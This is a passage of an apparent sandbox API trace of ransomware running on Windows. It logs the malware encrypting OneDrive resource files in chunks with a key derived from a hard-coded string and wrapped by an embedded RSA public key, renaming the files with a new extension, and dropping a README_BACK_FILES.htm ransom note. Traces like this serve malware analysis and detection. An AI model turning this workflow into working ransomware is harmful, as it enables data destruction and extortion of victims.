nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.450] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.451] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.452] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.453] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0276.453] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0276.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0276.453] CloseHandle (hObject=0x5d3c) returned 1 [0276.453] CloseHandle (hObject=0x5d48) returned 1 [0276.454] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.463] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.463] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.466] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.467] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.468] CryptDestroyKey (hKey=0x2fb608) returned 1 [0276.468] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.468] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.468] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.468] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\readme_back_files.htm")) returned 0xffffffff [0276.468] AreFileApisANSI () returned 1 [0276.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.468] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.469] GetFileType (hFile=0x5d4c) returned 0x1 [0276.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.471] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.471] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.472] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.472] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.472] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.472] GetLastError () returned 0x0 [0276.472] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.473] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.474] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.475] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.477] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.478] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0276.481] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.481] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.481] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.481] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0276.481] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.481] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2bae8) returned 1 [0276.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2bae8, dwCertEncodingType=0x1, pInfo=0x2f35c40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35c70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35c78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb188) returned 1 [0276.482] CryptEncrypt (in: hKey=0x2fb188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.482] CryptEncrypt (in: hKey=0x2fb188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b1e0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b1e0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2b1e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b1e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.483] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.485] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.485] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, 